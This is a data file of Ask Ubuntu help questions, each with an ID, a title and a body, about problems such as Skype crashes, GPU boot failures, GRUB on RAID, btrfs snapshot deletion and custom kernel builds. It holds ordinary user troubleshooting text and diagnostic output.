506048	what 's the issue with one specific valid account in accessing skype ?	i 'm using ubuntu 12.04 lts . i 'm using skype 4.3 for linux . whenever i log into skype with one valid specific account credentials the skype window disappears after i log-in . to verify the issue , i logged in with different valid account crdentials then it worked fine . i think that indicates skype has no issue . so for identfying the reason i went to terminal and run the following coomands : skype -- secondary the result after running this command is `` skype log-in window appears . after putting log-in details the contact list appears for the moment and everything vanishes . but at a terminal i 'm getting following output : aborted ( core dumped ) '' again i tried with following command : echo `` < yourskypeusername > '' `` < yourskypepassword > '' | skype -- pipelogin the result after running this command is `` skype log-in window appears . after putting log-in details the contact list appears for the moment and everything vanishes . but at a terminal i 'm getting following output : aborted ( core dumped ) '' in other words both the commands gave me same result . but if i log-in to skype with the same credentials on windows ( windows 7 and skype 4.3 for windows ) machine it works fine on it . now someone please help me in correcting the issue ? thanks in advance .
506051	ubuntu 14.04 will not boot with amd radeonhd 7990 card	i have been using ubuntu for a while but not very good in terminal commands or solving issues . i have a problem with booting up when i attach my gpu , where grub freezes to a black screen . if detach the gpu the system boots fine . by the way i have 4 radeon hd 7990 msi gpus where 3 are on 16x1 raisers and 1 is on 16x16 raiser . the gpu on 16x1 seem not conflict the boot as i do n't need to unplug them to have successful boot . i have reinstalled the latest catalyst drivers and set the grub to nomodeset ( following this tutorial ) but it has n't worked . i even tried a fix with boot repair and here is the url paste it gave me : http : //paste.ubuntu.com/7936415/ i have a apu a10 processor with a a88x mobo so i am not sure if that conflicts ... can someone help please , let me know if you need any other info cheers vini
506058	ubuntu 14.04 lts had unknown display in vmware workstation	im new to linux so please be patient with me , i decided to learn linux and loaded it into vmware workstation 10.0.0 b1379776 . it works ok but the display is limited to 800x600 . if i try to increase the resolution it wont work . it just says unknown display link to error image does anyone know how i can fix this so i can get all the resolutions to work ? the pc i am running it on is a windows 7 with two different video cards ati radeon hd 5670 nvidia geforce 9600 gt if anyone can help me fix this i would greatly appreciate it . please bear in mind that i am very new to linux so i will need a 'linux for dummies ' type response ; - )
506060	passing port to calibre-server via env variable in upstart script	i 'm trying to write an upstart script for calibre-server . i can add all the arguments i need using env variables except for -- port . description `` calibre ( ebook manager ) content server '' start on runlevel [ 2345 ] stop on runlevel [ ^2345 ] respawn env user='test' env password='test' env library_path='/var/lib/calibre' env name='calibre-server' env daemon='/usr/bin/ $ name' env max_cover='300x400' env port='80' env args= ' -- auto-reload -- max-cover $ max_cover -- port $ port' exec /usr/bin/calibre-server -- with-library $ library_path $ args -- username $ user -- password $ password using the above script , if i run start calibre-server it fails to start and in /var/log/upstart/calibre-server.log i get calibre-server : error : option -- port : invalid integer value : u ' $ port' removing the quotes to change the declaration to env port=80 does n't help . changing the args to env args= ' -- auto-reload -- max-cover $ max_cover -- port 80 ' works perfectly , but is n't ideal as i 'd like to keep all the variables consistently declared separately . any help greatly appreciated . also the first upstart script i 've written so shouting out about anything else that 's obviously wrong with it would be nice . i 'm using a new install of ubuntu 14.04 .
506066	set up linux laptop as wireless bridge	okay so i just recently moved , and my desktop computer is connected to the internet through a usb wireless adaptor to pick up wifi . the connection is spotty ( i will be connected with access sometimes , and the connection will drop later . then it will come back ) . therefore i wanted to turn my laptop ( running ubuntu 14.04 ) into a repeater/bridge for my desktop . here is the set up i had in mind : i want the laptop to be connected to the wifi ( as it receives a better signal ) . i then want to run an ethernet cable from the laptop to the desktop to give it a hardwired connection . the desktop is running windows 7 professional . i 've been searching literally for hours , so if anyone could walk me through the network configuration i 'd seriously appreciate it .
506069	how can i determine if something is a bug or not ?	what 's the the best way of ascertaining if something is a bug in ubuntu , as opposed to a problem i could rectify myself ?
506071	menu bar and launcher missing in ubuntu 14.04	after a restart my menu bar and launcher were missing . i have tried every solution for this issue that i can find , from re-installing unity and compiz to resetting unity and everything . then i decided to reinstall ubuntu 14.04 without formatting and still had the same problem . when i run unity i get error : plugin 'opengl ' not loaded . what can i do ?
506073	wireless cards went dead	it is my first time posting here and i want to thank you in advance for your time : ) . well , so i will try to describe my problem ... i am currently running kubuntu 12.04 lts on a toshiba laptop . i have an internal realtek rtl8723ae wireless card for which i have built and installed the drivers for my kernel and which used to work fine until now . i also have an external tp-link tl-wn722n wireless card which used to be autodetected by the system up to now and there was no problem whatsoever . this card has an atheros chipset . strange as it may sound , my problems began after using the tp-link card on a windows 7 machine . after making it work there - installing the drivers and so on - i pulled it and went to use it on my laptop again . i ca n't explain why , but it did n't work there anymore . it is not recognized by the system at all . i certainly did not do anything stupid in the meantime . i then thought `` this must be some evil bill gates curse '' . i mean , i tried not to be supersitious etc , but i still have n't found a more reasonable explanation . anyway , i started to search the internet and i found some answers related to this card . i tried some of them , but they did n't work . the last try i gave was this post here . after doing that , i rebooted the laptop . when my os loaded i could not see the card in my network manager ( same as after the `` bill gates curse '' ) , but now my internal card had disappeared as well ... i tried to reinstall its drivers but nothing happened ... this is the point where i am at now . i don ' t really know what to do . any help will be greately appreciated : ) . ( english is not my native language , so please excuse any mistakes ) these are the results from the wireless_script after fixing the issue with the internal card : # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise # # # # # kernel # # # # # linux matrix 3.2.0-58-generic # 88-ubuntu smp tue dec 3 17:37:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 08:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter [ 10ec:8723 ] subsystem : realtek semiconductor co. , ltd. device [ 10ec:0723 ] kernel driver in use : rtl8723e 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : toshiba america info systems device [ 1179 : fb37 ] kernel driver in use : r8169 # # # # # lsusb # # # # # bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 046d : c05f logitech , inc . bus 003 device 003 : id 0930:021d toshiba corp . bus 001 device 003 : id 04f2 : b307 chicony electronics co. , ltd bus 003 device 004 : id 0cf3:9271 atheros communications , inc. ar9271 802.11n # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no # # # # # lsmod # # # # # ath9k_htc 92738 0 ath9k_common 14053 1 ath9k_htc ath9k_hw 411239 2 ath9k_htc , ath9k_common ath 24067 3 ath9k_htc , ath9k_common , ath9k_hw rtl8723e 175439 0 rtlwifi 118798 1 rtl8723e mac80211 506862 3 ath9k_htc , rtl8723e , rtlwifi cfg80211 205774 4 ath9k_htc , ath , rtlwifi , mac80211 # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 20 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : '' ap_amyntaio_u8 '' mode : managed frequency:2.427 ghz access point : < mac address removed > bit rate=11 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=16/70 signal level=-94 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:696 missed beacon:0 # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.150.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.122.0 0.0.0.0 255.255.255.0 u 0 0 0 virbr0 192.168.150.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 # # # # # resolv.conf # # # # # nameserver 127.0.0.1 # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 [ ap_amyntaio_u8 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8723e state : connected default : yes hw address : < mac address removed > capabilities : speed : 11 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) cyta717589 : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 26 wpa2 *ap_amyntaio_u8 : infra , < mac address removed > , freq 2427 mhz , rate 11 mb/s , strength 32 ipv4 settings : address : 192.168.150.44 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.150.1 dns : 195.170.0.1 dns : 195.170.2.2 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # wlan0 scan completed : cell 01 - address : < mac address removed > channel:4 frequency:2.427 ghz ( channel 4 ) quality=16/70 signal level=-94 dbm encryption key : off essid : '' ap_amyntaio_u8 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s mode : master extra : tsf=000000000f456648 extra : last beacon : 532ms ago ie : unknown : 000e41505f414d594e5441494f5f5538 ie : unknown : 010482040b16 ie : unknown : 030104 ie : unknown : dd2a000c42000000011e000000002e660902ff0f776c616e5f4f4d4e49000000000000000000000005027b09 cell 02 - address : < mac address removed > channel:4 frequency:2.427 ghz ( channel 4 ) quality=18/70 signal level=-92 dbm encryption key : on essid : '' '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s mode : master extra : tsf=000000000f456186 extra : last beacon : 532ms ago ie : unknown : 0000 ie : unknown : 010482040b16 ie : unknown : 030104 ie : unknown : 050400010000 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : dd2a000c42000000011e000000002e660902ff0f776c616e5f4f4d4e49000000000000000000000005027b09 cell 03 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=14/70 signal level=-96 dbm encryption key : on essid : '' cyta717589 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=00000000e7338193 extra : last beacon : 848ms ago ie : unknown : 000a43595441373137353839 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 0706475220010d14 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1a7c181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606080000000000000000000000000000000000000000 ie : unknown : dd090010180200f02c0000 ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 # # # # # iwlist channel # # # # # wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz current frequency:2.427 ghz ( channel 4 ) # # # # # modinfo # # # # # filename : /lib/modules/3.2.0-58-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_htc.ko firmware : htc_9271.fw firmware : htc_7010.fw description : atheros driver 802.11n htc based wireless devices license : dual bsd/gpl author : atheros communications srcversion : c7c7dd7d23ed5c73a328e72 alias : usb : v0cf3p20ffd*dc*dsc*dp*ic*isc*ip* alias : usb : v0411p017fd*dc*dsc*dp*ic*isc*ip* alias : usb : v083apa704d*dc*dsc*dp*ic*isc*ip* alias : usb : v0846p9018d*dc*dsc*dp*ic*isc*ip* alias : usb : v0cf3p7010d*dc*dsc*dp*ic*isc*ip* alias : usb : v1668p1200d*dc*dsc*dp*ic*isc*ip* alias : usb : v0cf3p7015d*dc*dsc*dp*ic*isc*ip* alias : usb : v057cp8403d*dc*dsc*dp*ic*isc*ip* alias : usb : v0cf3pb003d*dc*dsc*dp*ic*isc*ip* alias : usb : v040dp3801d*dc*dsc*dp*ic*isc*ip* alias : usb : v04cap4605d*dc*dsc*dp*ic*isc*ip* alias : usb : v13d3p3350d*dc*dsc*dp*ic*isc*ip* alias : usb : v13d3p3349d*dc*dsc*dp*ic*isc*ip* alias : usb : v13d3p3348d*dc*dsc*dp*ic*isc*ip* alias : usb : v13d3p3346d*dc*dsc*dp*ic*isc*ip* alias : usb : v13d3p3328d*dc*dsc*dp*ic*isc*ip* alias : usb : v13d3p3327d*dc*dsc*dp*ic*isc*ip* alias : usb : v07d1p3a10d*dc*dsc*dp*ic*isc*ip* alias : usb : v0846p9030d*dc*dsc*dp*ic*isc*ip* alias : usb : v0cf3p1006d*dc*dsc*dp*ic*isc*ip* alias : usb : v0cf3p9271d*dc*dsc*dp*ic*isc*ip* depends : ath9k_hw , ath9k_common , mac80211 , ath , cfg80211 intree : y vermagic : 3.2.0-58-generic smp mod_unload modversions parm : debug : debugging mask ( uint ) parm : nohwcrypt : disable hardware encryption ( int ) filename : /lib/modules/3.2.0-58-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko license : dual bsd/gpl description : shared library for atheros wireless 802.11n lan cards . author : atheros communications srcversion : 87c8338518a200f45d72110 depends : ath , ath9k_hw intree : y vermagic : 3.2.0-58-generic smp mod_unload modversions filename : /lib/modules/3.2.0-58-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko license : dual bsd/gpl description : support for atheros 802.11n wireless lan cards . author : atheros communications srcversion : 5a4f26731216c44d9da1d5c depends : ath intree : y vermagic : 3.2.0-58-generic smp mod_unload modversions parm : force_new_ani : force new ani for ar5008 , ar9001 , ar9002 ( int ) filename : /lib/modules/3.2.0-58-generic/kernel/drivers/net/wireless/ath/ath.ko license : dual bsd/gpl description : shared library for atheros wireless lan cards . author : atheros communications srcversion : 8b429dbe4586f4065e2ea2e depends : cfg80211 intree : y vermagic : 3.2.0-58-generic smp mod_unload modversions filename : /lib/modules/3.2.0-58-generic/kernel/drivers/net/wireless/rtlwifi/rtl8723e/rtl8723e.ko firmware : rtlwifi/rtl8723efw.bin description : realtek 8723e 802.11n pci wireless license : gpl author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 161cc0ce5ce8dd8f90d732e alias : pci : v000010ecd00008723sv*sd*bc*sc*i* depends : mac80211 , rtlwifi vermagic : 3.2.0-58-generic smp mod_unload modversions parm : swlps : bool parm : swenc : using hardware crypto ( default 0 [ hardware ] ) ( bool ) parm : ips : using no link power save ( default 1 is open ) ( bool ) parm : fwlps : using linked fw control power save ( default 1 is open ) ( bool ) filename : /lib/modules/3.2.0-58-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 5ee6168d1b4bba473f6ccd0 depends : cfg80211 , mac80211 vermagic : 3.2.0-58-generic smp mod_unload modversions # # # # # modules # # # # # lp rtc fuse # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/blacklist-fglrx.conf ] blacklist radeon # # # # # udev rules # # # # # # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:1c.2/0000:09:00.0 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:1c.1/0000:08:00.0 ( rtl8723e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:1c.1/0000:08:00.0 ( rtl8723e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan1 '' # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:1c.1/0000:08:00.0 ( rtl8723e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan2 '' # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:1c.1/0000:08:00.0 ( rtl8723e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan3 '' # usb device 0x0cf3:0x9271 ( usb ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan4 '' # # # # # dmesg # # # # # [ 14.655533 ] rtl8723e 0000:08:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 14.655546 ] rtl8723e 0000:08:00.0 : setting latency timer to 64 [ 14.672901 ] firemare : rtl8723fw_b.bin [ 14.891443 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 14.891781 ] rtlwifi : wireless switch is on [ 17.341662 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 17.341975 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 22.463671 ] wlan0 : authenticate with < mac address removed > ( try 1 ) [ 22.465525 ] wlan0 : authenticated [ 22.498231 ] wlan0 : associate with < mac address removed > ( try 1 ) [ 22.501926 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x421 status=0 aid=2 ) [ 22.501932 ] wlan0 : associated [ 22.502823 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 29.489752 ] rtlwifi-0 : rtl_watchdog_wq_callback ( ) : < 0-0 > ap off , try to reconnect now [ 29.489803 ] wlan0 : connection to ap < mac address removed > lost . [ 30.931440 ] wlan0 : authenticate with < mac address removed > ( try 1 ) [ 30.933533 ] wlan0 : authenticated [ 30.933740 ] wlan0 : associate with < mac address removed > ( try 1 ) [ 30.939057 ] wlan0 : rx reassocresp from < mac address removed > ( capab=0x421 status=0 aid=2 ) [ 30.939060 ] wlan0 : associated [ 33.474061 ] wlan0 : no ipv6 routers present [ 53.562982 ] usb 3-2 : ath9k_htc : transferred fw : htc_9271.fw , size : 51272 [ 53.565886 ] usb 3-2 : ath9k_htc : unable to allocate urbs [ 53.565908 ] ath9k_htc : probe of 3-2:1.0 failed with error -22 [ 53.565935 ] usbcore : registered new interface driver ath9k_htc # # # # # # # # # # wireless info end # # # # # # # # # # # # i also reinstalled the kernel but the issue with tp-link remained .
506074	how to clean up dev/sda1 as it 's full	i 've been doing jmeter tests and have had a few outofmemoryexceptions , so i 've bumped up the heap memory in jmeter . but now it seems i ca n't run anymore tests as it says i 'm using 94.9 % of 14gb . when i use df -h it says dev/sda1 is full i was wondering if anyone can help me ? i think it has to do with the jvm from the jmeter
506078	ubuntu 14.04 wo n't run on windows 8	my acer aspire e1-571 runs on windows 8.1 , and i just downloaded virtualbox so i could run ubuntu 14.04 on it . i 've followed all of the instructions offered online for how to set up ubuntu on virtualbox , however when i try to start running ubuntu an error message comes up saying it terminated during startup using exit code 1 can anyone explain what is going on ?
506079	ubuntu 12.04 - reinstall grub on a raid-1 via livecd	i had a hardware issue which caused my ubuntu server to fail . after the problem has been resolved i still can not boot into my ubuntu installation , but fall into initramfs instead . to me it seems that there is something wrong with the boot manager . this is why i wanted to reinstall grub , but from the livecd i can not mount my system partitions . first i tried with bootrepair , but it could n't fix it . i guess it is not able to fix raid partitions . anyway here is its output : http : //paste.ubuntu.com/7887123/ and some further info : # blkid /dev/loop0 : type= '' squashfs '' /dev/sda : type= '' jmicron_raid_member '' /dev/sdb : type= '' jmicron_raid_member '' /dev/mapper/jmicron_jraid1p1 : uuid= '' f243e212-5167-4761-87b2-829106812fbc '' type= '' ext2 '' /dev/sdc : label= '' mylinuxlive '' uuid= '' f06c-c565 '' type= '' vfat '' dmraid -r /dev/sdb : jmicron , `` jmicron_jraid1 '' , mirror , ok , 390660096 sectors , data @ 0 /dev/sda : jmicron , `` jmicron_jraid1 '' , mirror , ok , 390660096 sectors , data @ 0 # fdisk -l /dev/mapper/jmicron_jraid1 warning : ignoring extra data in partition table 5 warning : ignoring extra data in partition table 5 warning : ignoring extra data in partition table 5 warning : invalid flag 0xffe2 of partition table 5 will be corrected by w ( rite ) disk /dev/mapper/jmicron_jraid1 : 200.0 gb , 200017969152 bytes 255 heads , 63 sectors/track , 24317 cylinders , total 390660096 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0008fa0e device boot start end blocks id system /dev/mapper/jmicron_jraid1p1 * 2048 382341119 191169536 83 linux /dev/mapper/jmicron_jraid1p2 382343166 390660095 4158465 5 extended /dev/mapper/jmicron_jraid1p5 ? 4256503776 8130664385 1937080305 e2 unknown i can mount only the first partition /dev/mapper/jmicron_jraid1p1 but it has some rather spare contents : root @ ubuntu : / # ls -la total 25719 drwxr-xr-x 4 root root 1024 aug 3 20:04 . drwxr-xr-x 1 root root 240 aug 3 17:58 .. -rw-r -- r -- 1 root root 919604 aug 14 2013 abi-3.8.0-29-generic -rw-r -- r -- 1 root root 154969 aug 14 2013 config-3.8.0-29-generic drwxr-xr-x 3 root root 5120 nov 1 2013 grub -rw-r -- r -- 1 root root 16516696 nov 1 2013 initrd.img-3.8.0-29-generic drwxr-xr-x 2 root root 12288 nov 1 2013 lost+found -rw -- -- -- - 1 root root 3187899 aug 14 2013 system.map-3.8.0-29-generic -rw -- -- -- - 1 root root 5426416 aug 14 2013 vmlinuz-3.8.0-29-generic there is only grub there and the images , so i can not follow to otherwise great advices from this askubuntu answer because i am missing the /dev , /proc , /sys and the /bin/bash in order to chroot to it . can anybody give me a hand in fixing this ? what would be the safest way ( for the data ) of fixing this ? i could maybe turn off the raid and use only the first hdd to fix this mess . then wipe the second one and recreate the raid array .
506080	maximazing window ( hidden unity launcher in the way )	does anyone know how to maximize the window all the way to the left when snapping to the top or maximazing the window ? http : //i.imgur.com/gqorwuw.png running 14.04 lts
506081	i want to install gnome on kubuntu 14.04 is it safe ?	i 'm new to linux and exploring diffrent things . anyway . if i installed gnome on my kubuntu 14.04 will gnome remove or replace the packages i installed ?
506082	ubuntu grub menu after installing centos ?	i am currently dual-booting windows 8 and ubuntu 14.04 , and would like to get some familiarity with linux server admin . i plan to install centos and maybe host a small website or something . what will happen to grub after installing centos ?
506084	ubuntu 12.04 freezes when switching to lightdm	i was changing the theme in my ubuntu 12.04 to mac os theme , constantly installing , logging in and out , rebooting when trying to fix things along the way . while i was doing a reboot , it froze , for the first time , showing letters on the screen that goes `` checking battery state ... '' . i searched the internet with my mobile phone , found a solution which was : sudo apt-get install gdm everything turned back to normal , and i did n't know what gdm was at that moment . i continued on changing and completing the new theme , then i wanted to change the appearance of the loggin screen , which turned out to be the gdm . so i changed it again to lightdm , rebooted , and it froze again when the ubuntu purple screen was showing . found a solution , which was to press alt+prt sc sys rq , typing r e i s u b at the same time , letter by letter . i rebooted again , and it froze again , now in the screen where it said `` could not write bytes : broken pipe '' . ( i assume the error has something to do with using windows 7 and ubuntu in dual boot . ) so using the same method , i got an access to the terminal , and typed sudo apt-get install gdm ( which told me that i already have it ) and put sudo dpkg-reconfigure gdm then changed the setting from lightdm to gdm from the screen . and now there was no freezing ... i ca n't figure out where the problem arose , and not sure where to look for to fix the problem . what should i do to be able to use lightdm ?
506086	duplicate system setting entries ubuntu 14.04	so here is my problem ! ( https : //fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-xaf1/t31.0-8/q71/s720x720/10560499_10202554417517299_8713822214062991785_o.jpg ) how can remove these duplicate entries ?
506089	change link on https : //help.ubuntu.com/community/osxapplicationsequivalents	there is a link on this page that is broken : https : //help.ubuntu.com/community/osxapplicationsequivalents the link for gnome do under the quicksilver category links redirects to porn/flash games . i made an account and logged in to change it , but it says the page is immutable . i do not know how to contact someone to change the site . please tell me what to do , or fix it yourself . the correct link is : http : //do.cooperteam.net/
506095	google maps brings down performance , even after close	i 'm using ubuntu 12 . google maps are very slow on my laptop , but even when i close browser ( chrome or chromium ) , the performance goes down significantly . it stops every 3-4 seconds for about a second , so works in kind of jerks . this holds until i reboot . was n't able to find anything suspicious in system monitor , all four cores are used to < 15 % , memory usage is ~20 % , so all far from full use . no any jumps as well , it just stops for a fraction of a second and gets back ... and again and again . what might be the problem ?
506098	btrfs can not delete snapshot - operation not permited	i can not delete a the btrfs subvolume `` 2014-07-28 '' which is a snapshot of the `` @ '' created by the kubuntu installer to serve as the kubuntu root . teneighty @ teneighty-ms-7924 : / $ sudo mount -o subvolid=5 /dev/sda5 /mnt teneighty @ teneighty-ms-7924 : / $ sudo btrfs sub list /mnt id 257 gen 1782 top level 5 path @ id 258 gen 1574 top level 5 path @ home id 266 gen 1761 top level 5 path 2014-07-28 teneighty @ teneighty-ms-7924 : / $ ls /mnt @ 2014-07-28 @ home teneighty @ teneighty-ms-7924 : / $ sudo btrfs sub del /mnt/2014-07-28/ delete subvolume '/mnt/2014-07-28' error : can not delete '/mnt/2014-07-28 ' - operation not permitted tried apt-btrfs-snapshot delete : teneighty @ teneighty-ms-7924 : / $ sudo apt-btrfs-snapshot delete /mnt/2014-07-28/ delete subvolume '/mnt/2014-07-28' error : can not delete '/mnt/2014-07-28 ' - device or resource busy if it 's busy , i should n't be able to do this , should i ? teneighty @ teneighty-ms-7924 : / $ sudo umount /mnt but it unmounts quietly . although i tested and it will unmount even if i have /mnt/2014-07-28 open in a file manager . i created the snapshot after installing kubuntu 14.04 , and then performed a substantial system update . after the update i created another snapshot , and i was able to delete that one without a problem . but the one i want to delete is the preupdate snapshot since everything is working fine post-update , i do n't expect i will need to roll back to a fresh installion stage . i have also attempted to delete it using the kubuntu live usb i installed from , that did n't work either . then i tried apt-btrfs-snapshot delete , and it is likely that this snapshot was originally located at @ /snapshots/2014-07-28 , and then i gained a better understanding of the ubuntu btrfs layout from documentation at help.ubuntu.com , so i moved my snapshots to the root btrfs volume . i tried to move it back , but it returned the same error . what could be causing this error on a snapshot ? why would apt-btrfs-snapshot say it is busy ? i do n't know where to go from here , but as the file system changes , i am going to need that space back .
506101	built kernel wo n't boot , missing ahci driver ?	i need to apply a kernel patch and so i set about building a kernel . first i fetched the source and build dependencies with # apt-get source linux-image-`uname -r` # apt-get build-dep linux-image-`uname -r` entering the source directory i applied my patch , and then grabbed the current kernel config and performed the build with # cp -vi /boot/config-`uname -r` .config # make-kpkg -- initrd -- append-to-version=-test kernel-image kernel-headers finally i installed the newly built kernel from the debs created in ../ # dpkg -i linux-image-3.13.11.4-test_3.13.11.4-test-10.00.custom_i386.deb # dpkg -i linux-headers-3.13.11.4-test_3.13.11.4-test-10.00.custom_i386.deb when rebooting i found my kernel in the grub menu , but trying to boot it i ended up with gave up waiting for root device ... alert ! /dev/disk/by-uuid/ [ my-correct-disk-uuid-here ] does not exist . at the resulting busybox prompt i 've tried looking in /dev/ and there are no disk drives present , which seems to indicate that the kernel module for my disk controller has not been loaded ( it is n't in /proc/modules ) . how can this be though , when i 've used the same kernel version that i 'm running as i type this - and with the same config ? building kernels is not something i do on a daily basis , nor for pleasure , so i would appreciate any help with this . edit : i should add that i 've tried using the /dev/sd** syntax for root= in the grub command line , with the same result . so it 's not that the uuid lookup fails ; the disk controller does n't even exist . in case it 's relevant , the machine is a thinkpad x32 with intel 's 855pm chipset ( pata hdd ) .
506103	problem with ap-hotspot	this is the message displayed in my terminal screen when i typed sudo ap-hotspot start another process is already running which process is running and how do i stop it ?
